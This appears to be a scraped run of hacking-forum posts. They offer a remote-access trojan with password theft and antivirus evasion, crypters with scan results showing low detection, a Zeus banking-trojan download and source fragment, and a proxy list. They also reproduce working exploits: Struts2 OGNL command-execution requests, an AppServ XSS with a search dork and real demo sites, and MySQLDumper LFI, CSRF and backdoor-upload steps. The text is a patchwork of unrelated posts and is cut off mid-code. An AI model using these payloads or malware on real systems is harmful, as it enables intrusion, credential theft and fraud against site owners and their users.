io.kent

- Opciones Server: Disable UAC Disable Restore System StartUp Server MSN Pass Google Chrome Pass ( En construcion para v2 con ayuda de otro soft) Firefox Pass ( En construcion para v2 con ayuda de otro soft) Delay Ejecute Disable Firewall ( All S.O ) Anti-Virtuales ( Vbox , VmWare , Virtual PC ) Anti-Sniffers RunTime Anti-Cmd RunTime Anti-Scans ( Jotti , virustotal , Virscan , chk4me ) Anti- Task Manager Anti-SandBox Anti-SysAnalizer Reiniciar Servidor Cerrar Servidor Compartir Users com el Autor - Opciones Managers : Desktop Capture Upload File And Ejecute Download File Actualizar Server via URL Abrir Sitio Remoto Listar Processos ( en construccion para v2 ) Listar Drives ( en construccion para v2 ) Opciones Lammerage : Desligar PC Remoto Reiniciar PC Remoto Hide Icons Show Icons Abrir CD Fechar CD Cerrar Monitor Ligar Monitor scan : Norivusthanks Report date: 2012-09-12 08:46:48 (GMT 1) File name: m3-rat-v1-exe File size: 2167243 bytes MD5 hash: 699455ed1b50f898ae4d1c310c609499 SHA1 hash: 17b7f0bb8302474f392fc3fe07196911b641a5c1 Detection rate: 0 on 14 (0%) Status: CLEAN Asquared 08:46:49 5.1.0.3 Avast 08:46:49 5.0 AVG 08:46:49 10.0.0.1190 Avira 08:46:49 7.11.7.12 BitDefender 08:46:49 7.0.0.2555 ClamAV 08:46:49 0.97.4 Comodo 08:46:49 1.0 DrWeb 08:46:49 5.0.2 Fprot 08:46:49 6.0 IkarusT3 08:46:49 T31001097 Panda 08:46:49 10.0.3.0 STOPZilla 08:46:49 5.0.0.0 TrendMicro 08:46:49 9.200.0.1012 VBA32 08:46:49 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org File information Report date: 2012-09-12 08:44:45 (GMT 1) File name: stub-exe File size: 350532 bytes MD5 hash: 63a68344ebd878b8c8353ce67e3a05b5 SHA1 hash: 70fb56865faf1ee6f5c210af7d8bc0fd8e3163a1 Detection rate: 1 on 14 (7%) Status: INFECTED Asquared 08:44:46 5.1.0.3 Avast 08:44:46 5.0 AVG 08:44:46 10.0.0.1190 Avira 08:44:46 7.11.7.12 BitDefender 08:44:46 7.0.0.2555 ClamAV 08:44:46 0.97.4 Comodo 08:44:46 1.0 DrWeb 08:44:46 5.0.2 Fprot 08:44:46 6.0 IkarusT3 08:44:45 T31001097 Panda 08:44:46 10.0.3.0 STOPZilla 08:44:46 5.0.0.0 Trojan.Win32.Mal.Gen.36092 TrendMicro 08:44:46 9.200.0.1012 VBA32 08:44:46 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org download Multiupload.nl - upload your files to multiple file hosting sites! code decrypt ÚËÔÙÒÕÕÚÊ» cryptat cu VELTROZ SI TITANCRYPT

PEcompact 3.03.23 beta + Patch PECompact3 is a utility of the genre known as "executable packers". Executable packers compress executables and modules so that their physical size is considerably smaller than it originally was. At runtime, the module (executable) is decompressed and reconstructed in memory. With high-performance executable packers such as PECompact v2.x, decompression and reconstruction is so rapid that load time may actually improve since the time saved by reading fewer bytes from the disk or network may exceed the time spent reconstructing and decompressing the module. PEcompact 3.03.23 beta + Patch.rar (1.28 MB) download Download setup.rar from Sendspace.com - send big files the easy way pass :: level-23.biz

Adobe After Effects (39 Videos) DreamWeaver (41 Videos) Flash (6 Videos) Photoshop (9 Videos) Premiere Pro (12 Videos) Computer Programming Android Development (200 Videos) C (15 Videos) C# (200 Videos) C++ (73 Videos) C++ GUI with Qt (14 Videos) Cocos 2D (20 Videos) Computer Game Development (17 Videos) iPhone Development (37 Videos) Java - Beginner (87 Videos) Java - Intermediate (59 Videos) Java - Game Development (36 Videos) Java - Game Development with Slick (12 Videos) JavaScript (40 Videos) jQuery (200 Videos) Objective-C (65 Videos) PHP (200 Videos) PHP Stock Market Analyzer (20 Videos) Python (43 Videos) Ruby (32 Videos) Trading Website (Project Lisa) (45 Videos) Visual Basic (200 Videos) wxPython (14 Videos) Computer Science 3Ds Max 2010 (22 Videos) How to Build a Computer (23 Videos) HTML5 (53 Videos) MySQL Database (33 Videos) Networking (6 Videos) UDK - Beginner (65 Videos) UDK - Advanced (2 Videos) XHTML & CSS (46 Videos) Educational Algebra (32 Videos) Basic Math (11 Videos) Biology (22 Videos) Chemistry (38 Videos) How to Build a Go Kart (35 Videos) Introduction to Geometry (63 Videos) Geometry (23 Videos) Physics (45 Videos) Robotics & Electronics (19 Videos) Other Battlefield 2 Gameplay (6 Videos) Backgammon (8 Videos) Bucky Roberts Live (10 Videos) Buckys Vlog (5 Videos) Call of Duty Gameplay (18 Videos) iPhone App Reviews (25 Videos) thenewboston Live! (113 Videos) thenewboston Podcast (39 Videos) Surviving the Wilderness (20 Videos) Surviving the Wilderness 2 (40 Videos) Tutorials

A small and simple but working LFI Scanner. Written in Perl. Did this because of the sake of codegrasm . I might remake this scrap and merge this with LaFuzz. Download - bunny-v1.0.gz bunny-v1.0.gz - bunny-pl - bunny-pl-v1.0 - LFI Scanner - Google Project Hosting Command-line accessGet a local copy of the bunny-pl repository with this command: Code : git clone https://code.google.com/p/bunny-pl/

scan : Report date: 2012-09-11 12:06:34 (GMT 1) File name: troncripter-exe File size: 1953792 bytes MD5 hash: 1b4a43a0381e45c7554fad29d2825569 SHA1 hash: 462c51fbbe5528c202528f850b54dd4a17b3971b Detection rate: 3 on 14 (21%) Status: INFECTED Asquared 12:06:34 5.1.0.3 Avast 12:06:34 5.0 AVG 12:06:34 10.0.0.1190 Dropper.VB.3.BS Avira 12:06:34 7.11.7.12 TR/Dropper.Gen BitDefender 12:06:34 7.0.0.2555 ClamAV 12:06:34 0.97.4 Comodo 12:06:34 1.0 DrWeb 12:06:34 5.0.2 Fprot 12:06:34 6.0 IkarusT3 12:06:34 T31001097 Panda 12:06:34 10.0.3.0 STOPZilla 12:06:34 5.0.0.0 TrendMicro 12:06:34 9.200.0.1012 VBA32 12:06:34 3.12.0.300 Malware-Cryptor.VB.gen.5 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org download Troncripter_orig.rar decrypt code pass: vgp0unqqvfw cryptat cu titancrypt

To see all the details about this exploit, please view: r00tsecurity -> Exploit & Advisory Center :: Apache Struts2 <= 2.3.1 Multiple Vulnerabilities code [COLOR="#FFF0F5"]SEC Consult Vulnerability Lab Security Advisory < 20120104-0 > ======================================================================= title: Multiple critical vulnerabilities in Apache Struts2 product: Apache Struts2 * OpenSymphony XWork * OpenSymphony OGNL vulnerable version: 2.3.1 and below fixed version: 2.3.1.1 impact: critical homepage: http://struts.apache.org/ found: 2011-11-18 by: Johannes Dahse, Andreas Nusser SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- Apache Struts2 is a web framework for creating Java web applications. It is using the OpenSymphony XWork and OGNL libraries. By default, XWork's ParametersInterceptor treats parameter names provided to actions as OGNL expressions. A OGNL (Object Graph Navigation Language) expression is a limited language similar to Java that is tokenized and parsed by the OGNL parser which invokes appropiate Java methods. This allows e.g. convenient access to properties that have a getter/setter method implemented. By providing a parameter like "product.id=1" the OGNL parser will call the appropiate setter getProduct().setId(1) in the current action context. OGNL is also able to call arbitrary methods, constructors and access context variables. For more details please refer to http://commons.apache.org/ognl/language-guide.html. Vulnerability overview/description: ----------------------------------- To prevent attackers calling arbitrary methods within parameters the flag "xwork.MethodAccessor.denyMethodExecution" is set to "true" and the SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by default. Also, to prevent access to context variables an improved character whitelist for paramteter names is applied in XWork's ParametersInterceptor since Struts 2.2.1.1: acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+"; Under certain circumstances these restrictions can be bypassed to execute malicious Java code. 1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator) When an exception occurs while applying parameter values to properties the value is evaluated as OGNL expression. For example this occurs when setting a string value to a property with type integer. Since the values are not filtered an attacker can abuse the power of the OGNL language to execute arbitrary Java code leading to remote command execution. This issue has been reported (https://issues.apache.org/jira/browse/WW-3668) and was fixed in Struts 2.2.3.1. However the ability to execute arbitrary Java code has been overlooked. 2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) The character whitelist for parameter names is not applied to Struts CookieInterceptor. When Struts is configured to handle cookie names, an attacker can execute arbitrary system commands with static method access to Java functions. Therefore the flag "allowStaticMethodAccess" can be set to true within the request. 3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor) Accessing the flag "allowStaticMethodAccess" within parameters is prohibited since Struts 2.2.3.1. An attacker can still access public constructors with only one parameter of type String to create new Java objects and access their setters with only one parameter of type String. This can be abused for example to create and overwrite arbitrary files. To inject forbidden characters to the filename an uninitialized string property can be used. 4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor) While not being a security vulnerability itself, please note that applications running in developer mode and using Struts DebuggingInterceptor are prone to remote command execution as well. While applications should never run in developer mode during production, developers should be aware that doing so not only has performance issues (as documented) but also a critical security impact. Proof of concept: ----------------- 1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator) Given Test.java has an property "id" of type Integer or Long and appropriate getter and setter methods: long id; Given test.jsp with result name=input is configured for action "Test": struts.xml: test.jsp The following request will trigger an exception, the value will be evaluated as OGNL expression and arbitrary Java code can be executed: /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b' An attacker can also overwrite flags that will allow direct OS command execution: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b' If test.jsp displays the property "id" the result of the Java code evaluation can be accessed: <%@ taglib prefix="s" uri="/struts-tags" %> 2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) Given struts.xml is configured to handle all cookie names (independent of limited cookie values): * 1,2 The following HTTP header will execute an OS command when sent to Test.action: Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1 3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor) Given Test.java has an uninitialized property "name" of type String: String name; // +getter+setter The following request will create/overwrite the file "C:/sec-consult.txt" (empty file): /Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1 The existence of the property 'x' used in these examples is of no importance. 4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor) Given struts.xml is configured to run in developer mode and to use the debugging interceptor: The following request will execute arbitrary OGNL expressions leading to remote command execution: /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc') Vulnerable / tested versions: ----------------------------- All products using Struts2 are affected by at least one critical vulnerability listed above! Proof of Concept 1.) has been tested with Jetty-6.1.25 26 July 2010 and Struts 2.2.1.1 Proof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25 26 July 2010 and Struts 2.2.1.1, 2.2.3.1 and 2.3.1 Vendor contact timeline: ------------------------ 2011-12-14: Contacting vendor through security at struts dot apache dot org 2011-12-14: Vendor reply, sending advisory draft 2011-12-14: Vendor released Apache Struts 2.3.1 in parallel 2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, Vendor contacted 2011-12-16: Vendor reply, discussing workaround 2011-12-20: Discussing release of fixed version 2011-12-21: Providing additional information 2012-01-03: Vendor informs that update is ready 2012-01-03: Patch (2.3.1.1) is available Solution: --------- Update to Struts 2.3.1.1 Workaround: ----------- Update to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the Parameters- and CookieInterceptor: acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[_']+"; Don't run your applications in developer mode. Advisory URL: ------------- https://www.sec-consult.com/en/advisories.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com EOF J. Dahse, A. Nusser / 2012[/COLOR]

dovnlad : Zippyshare.com - En-Decrypt Vita13.rar nu are parola scan novirusthanks Report date: 2012-09-11 09:37:38 (GMT 1) File name: en-decrypt-vita13-exe File size: 365568 bytes MD5 hash: 9bd772ad1e268b4593457eaaf9539ec9 SHA1 hash: bbe5e25a914ce5cbf786d55d20dd9be107dde88b Detection rate: 0 on 14 (0%) Status: CLEAN Asquared 09:37:38 5.1.0.3 Avast 09:37:38 5.0 AVG 09:37:38 10.0.0.1190 Avira 09:37:38 7.11.7.12 BitDefender 09:37:38 7.0.0.2555 ClamAV 09:37:38 0.97.4 Comodo 09:37:38 1.0 DrWeb 09:37:38 5.0.2 Fprot 09:37:38 6.0 IkarusT3 09:37:38 T31001097 Panda 09:37:38 10.0.3.0 STOPZilla 09:37:38 5.0.0.0 TrendMicro 09:37:38 9.200.0.1012 VBA32 09:37:38 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org

.::[ HacKer Hades Shell ]::. pass : hadeshtml merita un like!

download zeus zB2089.zip server [/color] .zip"]http://www.mediafire.com/file/x5x1xayj1tnsgbd/server[php].zipnu ma fac responsabil,le folositi pe pielea voastra... daca cineva nu stie sal configureze sami zica cai configurez eu! [color=#0000FF] PENTRU TOTI MEMBRI RsT[/color] PAROLA PM ! edit// nu dau parola la useri, cu 0 posturi, nu cereti, parola se da de la 50 de posturi in sus!

caramea nu lam luat de acolo, nici nu stiam de siteul acela, e luat din alta parte, mult mai tare am si programul zeus tot complect, daca cineva doreste sa-mi dea un site mai bun sil pun, si va luati gratis!

vas da si sursa dar nu pot din cauza cas dumps acolo cvv in grupa mare, si din cauza asta nu pot sa pun sursa..

#ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : ERROR : hMutex is still active"); #endif return FALSE; } // Deleting files if (!DeleteHiddenFile(szZeusPath)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusPath); #endif } #ifndef ZEUS_FASTCLEAN if (!DeleteHiddenFile(szZeusConfig)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusConfig); #endif } if (!DeleteHiddenFile(szZeusLog)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusLog); #endif } #endif #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : INFO : EXIT"); #endif return TRUE; }

118.233.96.32:2248 119.235.50.162:1080 122.104.148.123:45499 143.88.80.34:47038 173.213.145.181:35105 173.65.254.183:39121 173.88.243.186:4243 177.43.215.214:1080 178.157.41.10:1080 184.5.234.15:46545 200.140.146.140:1080 202.109.133.181:1080 202.195.128.106:1080 207.182.140.85:1080 207.194.87.105:1080 218.202.180.94:1080 220.162.14.114:1080 27.120.84.55:20864 36.55.233.70:26641 36.55.234.175:56619 46.117.88.202:11156 46.38.0.164:1080 61.177.248.202:1080 62.212.74.30:16248 62.33.191.41:20719 66.205.148.56:19781 67.160.55.1:51302 67.173.249.120:1846 68.153.213.71:27888 68.194.182.186:33482 69.204.234.171:20880 71.193.21.192:15311 71.205.149.97:28346 71.92.114.194:47165 76.170.117.151:42393 76.99.197.144:52393 78.88.139.236:5201 81.19.35.170:1080 82.18.254.182:45109 85.122.101.100:12350 85.226.186.182:4462 88.165.5.173:49802 93.127.3.99:1080 93.184.71.114:1080 94.195.120.210:6147 98.204.160.34:27202 98.220.56.75:4891 1.85.17.82:1080 106.1.59.94:21868 107.8.91.9:9478 112.162.30.135:4970 116.48.41.89:7782 117.103.173.226:1080 117.204.165.15:1080 119.60.9.90:1080 14.201.85.117:27956 146.115.132.12:11134 151.42.144.229:2281 173.245.228.177:11844 173.72.104.220:2749 178.63.120.140:1080 187.28.115.84:3752 187.33.50.254:1080 190.206.246.7:1080 190.254.93.52:49278 200.127.29.96:2118 205.178.127.176:14025 206.174.26.38:24149 206.72.201.92:1080 212.156.91.198:1080 218.7.191.182:1080 219.147.172.2:12345 221.1.215.90:1080 221.214.208.226:1080 24.53.48.60:59787 24.98.131.195:10753 31.11.70.158:4715 36.55.233.192:54859 36.55.233.192:64544 46.146.246.106:1080 46.161.171.105:46214 58.185.112.164:38679 62.44.110.80:3647 65.185.123.8:33644 66.169.87.186:5849 67.85.85.117:14649 68.54.150.141:29141 69.118.254.97:33439 70.95.255.217:50645 71.122.77.86:4571 71.125.60.218:22336 71.172.237.233:1454 71.172.237.233:28998 71.193.21.192:20453 71.194.161.16:39341 71.194.93.93:1783 72.78.136.71:34943 72.79.208.169:43115 74.123.23.42:44709 74.65.35.100:21353 76.120.134.176:1099 76.79.191.205:38989 78.46.186.204:4554 79.129.17.76:1080 79.132.65.97:1080 80.14.219.117:8491 81.213.157.150:10941 84.55.88.152:25938 87.101.117.10:10794 87.248.191.69:21 88.203.33.209:5025 90.151.160.197:1080 90.215.123.168:29203 98.204.160.34:4143 98.222.169.158:1800 98.243.148.116:60109 108.21.59.69:7977 122.160.148.113:1080 125.88.125.201:1080 173.190.218.30:45193 173.54.5.44:1794 183.178.247.76:8777 184.154.139.92:1080 206.174.26.38:11366 206.72.194.35:1080 24.183.147.163:28208 24.191.93.15:32830 24.191.93.15:58985 24.3.51.27:31597 24.53.48.60:60593 27.120.84.55:16143 36.55.233.70:59648 36.55.234.175:57059 37.49.37.230:38105 62.212.74.30:13314 62.212.74.30:19062 64.79.77.189:22642 66.229.18.79:47247 66.30.120.241:2607 67.165.15.135:19866 67.165.15.135:29749 67.170.90.243:1794 67.222.203.132:1529 68.193.133.124:25646 68.194.39.143:1826 68.37.60.250:46463 68.51.206.196:2527 69.119.71.122:1205 69.245.171.75:35877 71.125.60.218:51977 71.194.161.16:52559 71.235.105.130:28648 71.79.245.167:45388 71.8.85.133:23643 71.92.114.194:7189 72.43.175.154:52440 72.79.208.169:47541 75.68.42.8:22985 75.73.144.197:18436 76.120.97.67:33167 76.124.108.98:26192 76.188.63.161:23329 76.3.15.35:50404 76.90.166.59:1486 80.14.219.117:23340 80.50.144.146:1080 80.7.179.173:3247 80.78.79.75:8058 82.239.135.218:54039 82.99.199.28:1080 88.165.5.173:60027 88.168.145.126:4689 89.201.51.206:1080 90.150.9.38:1080 90.151.160.196:1080 91.225.76.83:1080 93.167.245.52:1788 96.22.125.9:12993 98.154.55.224:55201 98.209.217.96:8975 98.217.212.7:1627 108.15.77.84:51289 115.108.177.250:1080 141.255.160.144:1200 173.178.181.143:10796 173.217.74.204:36587 173.54.5.44:30284 173.58.203.178:55861 173.76.102.51:36190 174.54.209.10:56780 202.96.33.216:1080 216.75.122.47:28715 24.154.27.166:2805 24.170.60.94:1643 24.247.125.164:15270 24.247.66.2:6342 24.3.51.27:1089 58.185.112.164:40176 64.53.207.142:48421 66.176.202.121:10481 66.189.10.40:1974 67.81.13.128:1421 69.138.109.176:6153 69.139.85.38:1727 71.198.40.135:1955 71.229.54.158:12195 71.71.71.162:4483 71.8.71.43:2849 71.80.89.117:49858 72.216.36.143:2461 74.77.68.90:1330 76.108.68.185:1611 76.24.90.108:11213 77.242.27.80:8741 81.17.23.214:1111 93.167.245.61:1693 98.109.138.251:31048

Exploit Title: Apache 2.5.9=>2.5.10(win) Xss Vulnerability Author: Angel Injection url: http://www.appservnetwork.com Security -::RISK: Critical Dork For Keds: intext:"The AppServ Open Project - 2.5.10 for Windows" or intext:"The AppServ Open Project - 2.5.9 for Windows" Exploit index.php index.php?appservlang='"()%26%251[cross site scripting] Code <li><a href=\"appserv/ChangeLog.txt\"><span class=\"app\">"._CHANGELOG."</span></a></li> <li> <a href=\"appserv/README-$appservlang.php?appservlang=$appservlang\"><span class=\"app\">"._README."</span></a></li> <li><a href=\"appserv/AUTHORS.txt\"><span class=\"app\">"._AUTHOR."</span></a></li> <li><a href=\"appserv/COPYING.txt\"><span class=\"app\">"._COPYING."</span></a></li> http://server/index.php?appservlang='"()%26%251[cross site scripting] http://server/index.php?appservlang='"()%26%251"><script>alert(document.cookie)</script> DEMO SITE: http://203.131.209.137/index.php?appservlang=%27%22%28%29%26%251%3Cscript%3Ealert%281337%29%3C/script%3E http://sts.nthu.edu.tw/index.php?appservlang=%27%22%28%29%26%251%3Cscript%3Ealert%281337%29%3C/script%3E

Vulnerable Software: MySQLDumper Version 1.24.4 Downloaded from: [url]http://sourceforge.net/projects/mysqldumper/files/[/url] (MD5 SUM: b62357a0d5bbb43779d16427c30966a1 *MySQLDumper1.24.4.zip) ================================================================================================ About Software: What is MySQLDumper ? MySQLDumper is a PHP and Perl based tool for backing up MySQL databases. You can easily dump your data into a backup file and - if needed - restore it. It is especially suited for shared hosting webspaces, where you don't have shell access. MySQLDumper is an open source project and released under the GNU-license. ================================================================================================ Tested: *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off /* OS: Windows XP SP2 (32 bit) Apache: 2.2.21.0 PHP Version: 5.2.17.17 MYSQL: 5.5.23 ================================================================================================ Vuln Desc: MySQLDumper Version 1.24.4 is prone to: LFI,XSS,CSRF,PHP CODE ExeCution,traversal,Info Disclosure vulns. Local File Inclusion [url]http://192.168.0.15/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00[/url] /* Vulnerable COde Section //install.php if (!@ob_start("ob_gzhandler")) @ob_start(); $install_ftp_server=$install_ftp_user_name=$install_ftp_user_pass=$install_ftp_path=""; $dbhost=$dbuser=$dbpass=$dbport=$dbsocket=$manual_db=''; foreach ($_GET as $getvar=>$getval) { ${$getvar}=$getval; } foreach ($_POST as $postvar=>$postval) { ${$postvar}=$postval; } include_once ( './inc/functions.php' ); include_once ( './inc/mysql.php' ); include_once ( './inc/runtime.php' ); if (!isset($language)) $language="en"; $config['language']=$language; include ( './language/lang_list.php' ); include ( 'language/' . $language . '/lang_install.php' ); include ( 'language/' . $language . '/lang_main.php' ); include ( 'language/' . $language . '/lang_config_overview.php' ); */ XSS on inputs via $_POST [url]http://192.168.0.15/learn/cubemail/install.php?phase=1&language=en&submit=Installation[/url] [url]http://192.168.0.15/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;[/url] /*VUlnerable code section //index.php <?php if (!@ob_start("ob_gzhandler")) @ob_start(); include ('./inc/functions.php'); $page=(isset($_GET['page'])) ? $_GET['page'] : 'main.php'; if (!file_exists("./work/config/mysqldumper.php")) { header("location: install.php"); ob_end_flush(); die(); } ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="Author" content="Daniel Schlichtholz"> <title>MySQLDumper</title> </head> <frameset border=0 cols="190,*"> <frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize frameborder="0" marginwidth="0" marginheight="0"> <frame name="MySQL_Dumper_content" src="<?php echo $page; // <=here is ?>" scrolling="auto" frameborder="0" marginwidth="0" marginheight="0"> </frameset> </html> <?php ob_end_flush(); */ XSS via $_GET [url]http://192.168.0.15/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation[/url] [url]http://192.168.0.15/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E[/url] [url]http://192.168.0.15/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1[/url] [url]http://192.168.0.15/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E[/url] CSRF Delete application protection via $_GET <img src="http://192.168.0.15/learn/cubemail/main.php?action=deletehtaccess" /> *After this Application will become fully unprotected from World.* CSRF Drop database: <img src="http://localhost/tld/meonyourpc.PNG" heigth="250" width="300" /> <form name="hackit" id="hackit" action="http://192.168.0.15/learn/cubemail/main.php?action=db&dbid=1" method="post"> <p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p> <input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit"> </form> kill0 is always information_schema (obviously you can't drop it) Try to increment that index in ex: kill1 etc. CSRF Uninstall Application via $_GET [url]http://192.168.0.15/learn/cubemail/install.php?language=en&phase=101[/url] or [url]http://192.168.0.15/learn/cubemail/install.php?language=en&phase=2[/url] (This will delete existing config.php file) CSRF change password: <body onload="javascript:document.forms[0].submit()"> <form method="post" action="http://192.168.0.15/learn/cubemail/main.php?action=schutz"> <input name="username" id="username" type="text" value="pwnyou" /> <input name="userpass1" id="userpass1" type="text" value="pwnyou" /> <input name="userpass2" id="userpass2" type="text" value="pwnyou" /> <!--SHA1 (all Systems) --> <input type="radio" name="type" id="type2" value="2" checked="checked" > </form> username:pwnyou password:pwnyou CSRF:Execute SQL commands via $_GET In eg:( Create Denial Of Service Condition) <img src="http://192.168.0.15/learn/cubemail/sql.php?sql_statement=select+benchmark%28100000000,md5%28now%28%29%29%29--" heigth="0" width="0" /> After gain access to application (in eg: after successfully exploitation CSRF via delete protection technique) remote attacker can use this techniques to upload his/her backdoor. As result this will completely compromise site. *Upload backdoor:* Rename your backdoor on your pc to me.php.gz Then switch to: [url]http://192.168.0.15/learn/cubemail/filemanagement.php?action=files[/url] Upload it: Then Switch to: [url]http://192.168.0.15/learn/cubemail/main.php?action=edithtaccess[/url] On input box called: File: enter relative/absolute path to your uploaded me.php.gz (default ./work/backup/me.php.gz) Click RELOAD button. On inputbox called File: Change file extension to: ./work/backup/me.php Click save button and Vuala you have your own backdoor there. You can find it: [url]http://192.168.0.15/learn/cubemail/work/backup/me.php[/url] Same tehcnique can be used without upload any file: Todo so: Switch to [url]http://192.168.0.15/learn/cubemail/filemanagement.php?action=files[/url] Enter non existent file name on input called File: in eg: mybackdoor.php Click reload button. it will ask *Create it?* Click *Create* Button. Copy paste your backdoor content to textarea and Click Save button. Same technique can be used to add CUSTOM .htaccess Handler (to execute backdoor in eg: as *.gif file) *NOTE* Second technique can be used by attacker to overwrite existing files./read arbitraty files on site/server. Theris also chance to execute our code using eval PHP language *construct*. We have PHP Code ExeCution here: Vulnerable code section: /* //menu.php if (isset($_POST['selected_config'])||isset($_GET['config'])) { if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config']; // Configuration was switched in content frame? if (isset($_GET['config'])) $new_config=$_GET['config']; // restore the last active menuitem if (is_readable($config['paths']['config'].$new_config.'.php')) { clearstatcache(); unset($databases); $databases=array(); if (read_config($new_config)) { $config['config_file']=$new_config; $_SESSION['config_file']=$new_config; //$config['config_file']; $config_refresh=' <script language="JavaScript" type="text/javascript"> if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1) { var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value; } else selected_div=\'\'; parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>'; } if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern } } */ As you can see we can traverse it + if we will look to read_config() function //inc/functions_global.php function read_config($file=false) { global $config,$databases; $ret=false; if (!$file) $file=$config['config_file']; // protect from including external files $search=array(':', 'http', 'ftp', ' '); $replace=array('', '', '', ''); $file=str_replace($search,$replace,$file); if (is_readable($config['paths']['config'].$file.'.php')) { // to prevent modern server from caching the new configuration we need to evaluate it this way clearstatcache(); $f=implode('',file($config['paths']['config'].$file.'.php')); $f=str_replace('<?php','',$f); $f=str_replace('?>','',$f); eval($f); $config['config_file']=$file; $_SESSION['config_file']=$config['config_file']; $ret=true; } return $ret; } this means remote attacker can iterate his/her code as PHP.(Notice: eval($f)) Our exploit: [url]http://192.168.0.15/learn/cubemail/menu.php?config=../../ss[/url] where ss = ss.php #cat ss.php # in eg attacker uploaded his/her own file: echo 'Our command executed ' . getcwd(); phpinfo(); Print screen: [url]http://s007.radikal.ru/i302/1204/c3/fd5aac2a58c5.png[/url] Theris also a lot of CROSS Site Scripting Vulnerabilities: (XSS) Switch to: [url]http://192.168.0.15/learn/cubemail/sql.php?db=information_schema&dbid=0[/url] Enter: select '<script>alert(1);</script>' and click Execute SQL Statement. Traversal: /*Vulnerable Code Section: //filemanagement.php <?php if (isset($_GET['action'])&&$_GET['action']=='dl') $download=true; include ('./inc/header.php'); include_once ('./language/'.$config['language'].'/lang.php'); include_once ('./language/'.$config['language'].'/lang_filemanagement.php'); include_once ('./language/'.$config['language'].'/lang_config_overview.php'); include_once ('./language/'.$config['language'].'/lang_main.php'); include_once ('./inc/functions_files.php'); include_once ('./inc/functions_sql.php'); $msg=''; $dump=array(); if ($config['auto_delete']==1) $msg=AutoDelete(); get_sql_encodings(); // get possible sql charsets and also get default charset //0=Datenbank 1=Struktur $action=(isset($_GET['action'])) ? $_GET['action'] : 'files'; $kind=(isset($_GET['kind'])) ? $_GET['kind'] : 0; $expand=(isset($_GET['expand'])) ? $_GET['expand'] : -1; $selectfile=(isset($_POST['selectfile'])) ? $_POST['selectfile'] : ""; $destfile=(isset($_POST['destfile'])) ? $_POST['destfile'] : ""; $compressed=(isset($_POST['compressed'])) ? $_POST['compressed'] : ""; $dk=(isset($_POST['dumpKommentar'])) ? ((get_magic_quotes_gpc()) ? stripslashes($_POST['dumpKommentar']) : $_POST['dumpKommentar']) : ""; $dk=str_replace(':','|',$dk); // remove : because of statusline $dump['sel_dump_encoding']=(isset($_POST['sel_dump_encoding'])) ? $_POST['sel_dump_encoding'] : get_index($config['mysql_possible_character_sets'],$config['mysql_standard_character_set']); $dump['dump_encoding']=isset($config['mysql_possible_character_sets'][$dump['sel_dump_encoding']]) ? 